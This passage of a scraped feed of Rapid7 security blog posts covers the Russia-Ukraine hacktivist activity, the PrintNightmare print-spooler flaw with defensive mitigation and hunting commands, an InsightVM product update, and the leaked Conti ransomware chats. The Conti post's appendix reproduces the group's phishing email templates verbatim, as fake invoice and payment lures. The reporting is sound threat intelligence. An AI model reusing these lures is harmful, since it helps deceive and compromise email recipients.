Protocol (BGP) that is central to the Internet\u2019s global routing system.\n\n**CISA threat advisory:** CISA [recently reiterated](<https://twitter.com/CISAJen/status/1499117064006639617?s=20&t=9UfrQnQTUg43QsbKoQOhJA>) that it has no specific, credible threat against the U.S. at this time. It continues to point to its [Shields Up](<https://www.cisa.gov/shields-up>) advisory for resources and updates related to the Russia-Ukraine conflict.\n\n**Threat Intelligence Update**\n\n * ******An Anonymous-affiliated hacking group claims to have hacked a branch Russian Military and Rosatom, the Russian State Atomic Energy Corporation****.**\n\nThe hacktivist group Anonymous and its affiliate have hacked and leaked access to the phone directory of the military prosecutor's office of the southern military district of Russia, as well as documents from the Rosatom State Atomic Energy Corporation.\n\n_Available in Threat Library as: OpRussia 2022 (for Threat Command customers who want to learn more)_\n\n * ******A threat actor supporting Russia claims to have hacked and leaked sensitive information related to the Ukrainian military****.**\n\nThe threat actor \u201cLenovo\u201d claims to have hacked a branch of the Ukrainian military and leaked confidential information related to its soldiers. The information was published on an underground Russian hacking forum.\n\n_Source: XSS forum (discovered by our threat hunters on the dark web)_ \n\n\n * ******An Anonymous hacktivist associated group took down the popular Russian news website lenta.ru******\n\nAs part of the OpRussia cyber-attack campaign, an Anonymous hacktivist group known as \u201cEl_patron_real\u201d took down one of the most popular Russian news websites, **lenta.ru**. As of Thursday afternoon, March 3, the website is still down.\n\n_Available in Threat Library as: El_patron_real (for Threat Command customers who want to learn more)_\n\n_**Additional reading:**_\n\n * [_Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>)\n * [_Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)\n * [_Staying Secure in a Global Cyber Conflict_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)\n * [_Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-04T14:30:00", "type": "rapid7blog", "title": "Russia-Ukraine Cybersecurity Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-04T14:30:00", "id": "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "href": "https://blog.rapid7.com/2022/03/04/russia-ukraine-cybersecurity-updates/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-12T14:55:46", "description": "![CVE-2021-34527 \$PrintNightmare\$: What You Need to Know](https://blog.rapid7.com/content/images/2021/06/evil-printer.jpeg)\n\n**Vulnerability note:** This blog originally referenced CVE-2020-1675, but members of the community noted the week of June 29 that the publicly available exploits that purported to exploit CVE-2021-1675 may in fact have been targeting a new vulnerability in the same function as CVE-2021-1675. This was later confirmed, and Microsoft issued a new CVE for what the research community originally thought was CVE-2021-1675. Defenders should now follow guidance and remediation information on the new vulnerability identifier,[CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), instead.\n\nOn June 8, 2021, Microsoft released an advisory and patch for [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) (\u201cPrintNightmare\u201d), a critical vulnerability in the Windows Print Spooler. Although [originally classified](<https://www.rapid7.com/blog/post/2021/06/08/patch-tuesday-june-2021/>) as a privilege escalation vulnerability, security researchers have demonstrated that the vulnerability allows authenticated users to gain remote code execution with SYSTEM-level privileges. On June 29, 2021, as proof-of-concept exploits for the vulnerability began circulating, security researchers discovered that a vulnerability they thought to be CVE-2021-1675 was still exploitable on some systems that had been patched. As of July 1, at least three different proof-of-concept exploits [had been made public](<https://github.com/afwu/PrintNightmare>).\n\nRapid7 researchers confirmed that public exploits worked against fully patched Windows Server 2019 installations as of July 1, 2021. The vulnerable service is enabled by default on Windows Server, with the exception of Windows Server Core. Therefore, it is expected that in the vast majority of enterprise environments, Windows systems are vulnerable to remote code execution by authenticated attackers.\n\nThe vulnerability is in the `RpcAddPrinterDriver` call of the Windows Print Spooler. A client uses the RPC call to add a driver to the server, storing the desired driver in a local directory or on the server via SMB. The client then allocates a `DRIVER_INFO_2` object and initializes a `DRIVER_CONTAINER` object that contains the allocated `DRIVER_INFO_2` object. The `DRIVER_CONTAINER` object is then used within the call to `RpcAddPrinterDriver` to load the driver. This driver may contain arbitrary code that will be executed with SYSTEM privileges on the victim server. This command can be executed by any user who can authenticate to the Spooler service.\n\n## Updates\n\n**9 July 2021**: Microsoft [released revised guidance on CVE-2021-34527](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) the evening of July 8. According to the Microsoft Security Response Center, the out-of-band security update "is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration." This is consistent with Microsoft's emphasis earlier in the week that the out-of-band update effectively remediates CVE-2021-34527 **as long as Point and Print is not enabled.**\n\nThe [updated guidance from July 8, 2021](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) also contains revisions to the registry keys that must be set to `0` (or must not be present) in order to ensure that Point and Print is disabled in customer environments. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` and\n * `NoWarningNoElevationOnUpdate = 0`\n\n**However, as of July 8, 2021, one of the registry keys that must be set to a 0 (zero) value has changed.** Current guidance is that Point and Print can be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n\nWe have updated the `Mitigation Guidance` section in this post to reflect the latest remediation guidance from Microsoft. Further details can still be found in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>).\n\n**7 July 2021**: Microsoft released out-of-band updates for some (but not all) versions of Windows the evening of July 6, 2021. According to Microsoft's updated advisory, "the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as \u201cPrintNightmare\u201d, documented in CVE-2021-34527." Exploitation in the wild has been detected, and ALL Windows systems are affected\u2014not just domain controllers.\n\n**As of July 7, 2021, multiple community researchers have disputed the efficacy of Microsoft's out-of-band fixes for CVE-2021-34527, noting that the local privilege escalation (LPE) vector may not have been addressed, and while the July 6 updates may have remediated the original MS-RPRN vector for remote code execution, RCE is [still possible using MS-PAR](<https://twitter.com/gentilkiwi/status/1411792763478233091>) with Point and Print enabled.** Several prominent researchers have tested ongoing exploitability, including [Will Dormann of CERT/CC](<https://twitter.com/wdormann/status/1412813044279910416>) and Mimikatz developer [Benjamin Delpy](<https://twitter.com/gentilkiwi/status/1412771368534528001>). Dormann [tweeted](<https://twitter.com/wdormann/status/1412813044279910416>) on July 7, 2021 just after noon EDT that "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE."\n\nRapid7 researchers have confirmed that Metasploit and other public proof-of-concept code is still able to achieve remote code execution using both MS-RPRN and the UNC path bypass _as long as Point and Print is enabled._ When Point and Print is disabled using the guidance below, public exploit code fails to achieve remote code execution.\n\nTo fully remediate PrintNightmare CVE-2021-34527, Windows administrators should review Microsoft's guidance in in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>), install the out-of-band updates released July 6, 2021, and disable Point and Print. Microsoft also recommends restricting non-administrators from installing any signed or unsigned printer drivers on printer servers. See the **Mitigation Guidance** section below for detailed guidance.\n\n**6 July 2021**: Since this blog was initially posted, additional information has become available. Microsoft has issued a new advisory and assigned a new CVE ID to the PrintNightmare vulnerability: [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). \nThe new guidance recommends disabling the print spooler, as we initially recommended, and also contains instructions to disable inbound remote printing through Group Policy.\n\nThese are only workarounds and a patch remains unavilable at this time. \nSince this vulnerability has no patch and multiple proofs-of-concept are freely available, we recommend implementing a workaround mitigation as soon as possible. We advise folowing one of the two workarounds on all Domain Controllers and any other Windows machines\u2014servers or clients\u2014which meet either of the following criteria:\n\n 1. Point and Print is enabled\n 2. The Authenticated Users group is nested within any of the groups that are listed in the [mitigation section of Microsoft's advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\nFrom a technical standpoint, additional information from Cube0x0 and Benjamin Delpy suggests that the `RpcAddPrinterDriver` is not the only vulnerable function, and the Win32 `AddPrinterDriverEx` function will also work correctly.Some proofs of concept used only the RPRN `RpcAddPrinterDriver` function and did not work on certain machines; others have been demonstrated to work on servers and clients other than domain controllers using `AddPrinterDriverEx`. This has also been referred to as "SharpPrintNightmare".\n\n## Mitigation Guidance\n\nUp until July 6, 2021, the most effective mitigation strategy was to disable the print spooler service itself. Since July 6, Microsoft's guidance on remediating CVE-2021-34527 has undergone several revisions. Updated mitigation guidance is below, and we have also preserved our original guidance on disabling the print spooler service. The Microsoft Security Response Center [published a blog](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) with the details below on July 8, 2021.\n\n**As of July 9, 2021:** \nTo fully remediate CVE-2021-34527, Windows administrators should review Microsoft's guidance in in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) and do the following:\n\n 1. Install the cumulative update released July 6, 2021.\n 2. Disable Point and Print by setting the following registry keys to `0` (or ensuring they are not present):\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n 3. Configure the `RestrictDriverInstallationToAdministrators` registry value to prevent non-administrators from installing printer drivers on a print server. Setting this value to 1 or any non-zero value prevents a non-administrator from installing any signed or unsigned printer driver on a printer server. Administrators can install both a signed or unsigned printer driver on a print server.\n\n**Note:** This guidance has been revised and reflects new information published by Microsoft on July 8, 2021. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` and `NoWarningNoElevationOnUpdate` registry keys to `0`. As of July 9, 2021, this information is outdated and Windows customers should use the [revised guidance](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>).\n\nAfter installing the July 2021 out-of-band update, all users will be either administrators or non-administrators. Delegates will no longer be honored. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for further information.\n\nIf your organization does not require printing to conduct business operations, you may also disable the print spooler service. This should be done on all endpoints, servers, and especially domain controllers. Dedicated print servers may still be vulnerable if the spooler is not stopped. Microsoft [security guidelines](<https://docs.microsoft.com/en-us/windows-server/security/windows-services/security-guidelines-for-disabling-system-services-in-windows-server#print-spooler>) do not recommend disabling the service across all domain controllers, since the active directory has no way to remove old queues that no longer exist unless the spooler service is running on at least one domain controller in each site. However, until this vulnerability is effectively patched, this should have limited impact compared to the risk.\n\nOn Windows cmd:\n \n \n net stop spooler\n \n\nOn PowerShell:\n \n \n Stop-Service -Name Spooler -Force\n Set-Service -Name Spooler -StartupType Disabled\n \n\nThe following PowerShell commands can be used to help find exploitation attempts:\n \n \n Get-WinEvent -LogName 'Microsoft-Windows-PrintService/Admin' | Select-String -InputObject {$_.message} -Pattern 'The print spooler failed to load a plug-in module'\n \n \n \n Get-WinEvent -FilterHashtable @{Logname='Microsoft-Windows-PrintService/Operational';ID=316} | Select-Object *\n \n\n## Rapid7 Customers\n\nWe strongly recommend that all customers either install the July 6, 2021 out-of-band updates **and** disable Point and Print via the two registry keys detailed in the `Mitigation Guidance` section above, **OR** disable the Windows Print Spooler service altogether on an emergency basis to mitigate the immediate risk of exploitation. InsightVM and Nexpose customers can assess their exposure to CVE-2021-34527 with authenticated checks in the July 8, 2021 content release. Checks look for the out-of-band patches Microsoft issued on July 6, 2021 and additionally ensure that Point and Print has been disabled in customer environments. InsightVM and Nexpose checks for CVE-2021-1675 were [released earlier in June](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-1675/>).\n\nVelociraptor users can use [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmare/>) and [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmaremonitor/>) to hunt for .dll files dropped during PrintNightmare exploitation. An exploit module is also available to Metasploit Pro customers.\n\nWe will continue to update this blog as further information comes to light.", "cvss3": {}, "published": "2021-06-30T18:15:59", "type": "rapid7blog", "title": "CVE-2021-34527 (PrintNightmare): What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1675", "CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-06-30T18:15:59", "id": "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "href": "https://blog.rapid7.com/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-08T15:44:47", "description": "![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/insightvm-q3.jpg)\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-1.png)\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-2.png)\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:28:27", "description": "![Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict](https://blog.rapid7.com/content/images/2022/03/contileaks.jpg)\n\n**_UPDATE: _**_As of March 2, 2022, Conti began taking down exposed infrastructure as a result of the chat disclosure. At that time, we assessed that due to their sophisticated capability, deep funding, and quick recovery from exposed infrastructure in November 2021, they remained an active and significant threat. As of March 9, 2022, our threat intelligence team has observed a resumption of normal operations from Conti._\n\nOn February 27, Twitter user [@ContiLeaks](<https://twitter.com/contileaks>) released a trove of chat logs from the ransomware group, Conti \u2013 a sophisticated ransomware group whose manual was publicly [leaked last year](<https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html>). Ahead of the chat log disclosures, Conti pledged their support for the Russian Government following the Russian invasion of Ukraine. However, a number of members sided with Ukraine, causing strife within the organization. Two days later, Conti posted a second message revising their statement to condemn the war and to strike back only if Russian critical infrastructure is targeted.\n\n![Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict](https://blog.rapid7.com/content/images/2022/03/image3.png)_Conti announcement of support for Russian government_\n\n![Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict](https://blog.rapid7.com/content/images/2022/03/image1.jpg)_Conti walk-back of their support for Russia_\n\n![Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict](https://blog.rapid7.com/content/images/2022/03/image4.png)_@ContiLeaks announcement of the release_\n\nAt the time of the leak, a file titled `1.tgz` was released on the \u201cAnonFiles\u201d website, containing 14 megabytes of chat logs across 393 JSON files. However, some of the messages were encrypted and could not be read, so the information provided is necessarily incomplete. The remaining files contained internal Conti communications, screenshots of tools, and discussions of their exploits and design processes. \n\nOn February 28 and March 1, a bevy of additional files were posted, along with a number of pro-Ukraine tweets. Among both sets of leaked messages, there were a number of usernames and passwords for a variety of accounts. Additionally, user @ContiLeaks shared access details for a number of alleged Conti command and control servers, plus storage servers for stolen files. However, we have not accessed any of the data necessitating access to remote servers or the use of usernames and passwords, and we strongly recommend against doing so. \n\n@ContiLeaks also shared a file that they purport to be the source code for the Conti ransomware but declined to share the password except with \u201ctrusted parties.\u201d @ContiLeaks did, however, name one alleged Conti developer, providing their email address and Github. The scale of the leaked information suggests that the leaker is likely either a very senior member of the group or a coalition of disgruntled Conti affiliates.\n\n## Conti is a business \u2013 and a well-funded one\n\nMuch of the discussion within the chat logs concerns fairly mundane things \u2013 interviewing potential operators of the group, payment for services, out-of-office messages, gossip, and discussions of products. Based on the leaked chats, the Conti interview process actually looks a lot like a standard technical interview, with coding exercises to be performed hosted on public code repositories, salary negotiations, and the status of ongoing products. \n\nIn addition to other financial information related to specific actors, the leaked chats have revealed Conti\u2019s primary Bitcoin address, which contains over **two billion USD** as of February 28, 2022. Moreover, a conversation on April 9, 2021 between \u201cmango\u201d and \u201cjohnyboy77\u201d indicates Russian FSB involvement in some portion of their funding and that the FSB were interested in files from the media outlet Bellingcat on \u201cNavalny\u201d \u2013 an apparent reference to Alexei Navalny, the currently imprisoned opposition leader in Russia.\n\n## Conti development\n\nConti seems to operate much like a software company \u2013 the chat logs disclose concerns with the development of specific features for targets and a particular difficulty in encrypting very large files. The Conti team also attempted to get demos of popular endpoint detection software with the intent to develop their malware to avoid detection.\n\nTwo of the actors, \u201clemur\u201d and \u201cterry\u201d shared phishing templates (included verbatim in Appendix B at the end of this post) to be used against potential targets. Conti gains initial access in many ways, with phishing a popular line of attack due in part to its relatively high efficacy and low cost. Conti often uses phishing emails to establish a presence on targeted networks.\n\nA screenshot of the Conti control panel was also leaked, showing a number of compromised hosts and a breakdown of the operating systems, antiviruses, user rights, and detailed information about the infected assets.\n\n![Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict](https://blog.rapid7.com/content/images/2022/03/image2.png)_Conti control panel_\n\nFurther discussions detailed the use of infrastructure against targets, disclosing a number of both known and unknown Conti command and control domains. At the time of this post, only a small number of the previously unknown command and control domains appear to be active. Conversations between two operators, \u201cStern\u201d and \u201cBentley\u201d discuss the use of third parties for malicious documents, favoring certain providers over others. They also discuss logistics for how to deliver ransomware without being detected by dynamic analysis. In a conversation between the two back in June of 2021, Stern discloses that Conti wants to start their own cryptocurrency but does not know who to work with. There is no evidence that anything came of this desire, and Conti continues to use Bitcoin for their ransoms. \n\n## Other groups assert they are strictly business\n\nIn stark contrast to Conti, other groups have made it clear to the public that despite their \u201cbusiness model,\u201d they take no public stance on this crisis. LockBit is remaining aloof from the conflict and made it clear that they intend to operate as usual. Although it is believed that LockBit is a Russian organization, they assert that \u201cwe are all simple and peaceful people, we are all Earthlings,\u201d and \u201cfor us it is just business and we are all apolitical.\u201d Another ransomware group, ALPHV, claims to be \u201cextremely saddened\u201d by Conti\u2019s pledge of support and condemns Conti. Their message concludes, \u201cThe Internet, and even more so its dark side, is not the place for politics.\u201d\n\n## Rumors of Conti\u2019s demise have been greatly exaggerated\n\nConti\u2019s payment and \u201csupport\u201d portal is still live, even following the infighting and leaks. Conti has repeatedly proven to be one of the most capable ransomware actors and these chats indicate that the group is well-organized and still very well-funded despite the schism. Any suggestion that these leaks spell the end for Conti is overstated, and we expect that Conti will continue to be a powerful player in the ransomware space.\n\n## What you can do\n\nWe are keeping an eye on dark web activity related to Conti and other ransomware groups and want to reiterate the following steps for protecting yourself from ransomware: \n\n\n * User education, especially related to well-crafted phishing campaigns\n * Asset and vulnerability management, including reducing your external attack surface\n * Multi-factor authentication \n\n\nAdditionally, it is worth ensuring that you are well-guarded against the exploits and malware commonly used by Conti (vulnerabilities provided in Appendix A at the end of this post). Furthermore, security teams should also take some time to review [CISA\u2019s recent report on the group](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>). For further discussion on how to protect yourself from ransomware, see our [ransomware playbook](<https://www.rapid7.com/solutions/ransomware/>). \n\n\n## Appendix A \u2013 Conti known exploited vulnerabilities\n\nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146 (MS17-010; EternalBlue/EternalSynergy/EternalChampion)\n\nCVE-2020-1472 (ZeroLogon)\n\nCVE-2021-34527 (PrintNightmare)\n\nCVE-2021-44228 (Log4Shell)\n\nCVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (ProxyShell/ProxyLogon)\n\n## Appendix B \u2013 Phishing templates\n\n{Greetings|Hello|Good afternoon|Hi|Good day|Greeting|Good morning|Good evening}! \n{Here|Right here|In this letter|With this letter} we {send|direct} you {all the|all the necessary|the most important} {documentation|papers|documents|records} {regarding|concerning|relating to} your {payment|deposit payment|last payment} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u041f\u041b\u0410\u0422\u0415\u0416\u0410, right {as we|as we have} {discussed|revealed} {not so long ago|not too long ago|recently|just recently|not long ago}. Please {review the|check the|take a look at} \u0430ll {necessary|required|important} {information|data} in the {file attached|attached file}. \n\u0422: {Payment|Deposit payment} {invoice|receipt} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u0418\u041d\u0412\u041e\u0419\u0421\u0410 {prepared|formed} \nD: {payment|deposit|dep|paym}_{info|information|data}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \nYour {order|purchase order|online order} was {successfully|correctly|timely} {paid|compensated|covered} by you {yesterday|today|recently}. Your {documentation|docs|papers} and {bank check|receipt|paycheck} {can be found|are listed} in the {attached file|file attached}. \nT: {Invoice|Given invoice|Bill} {we|we have|we\u2019ve} 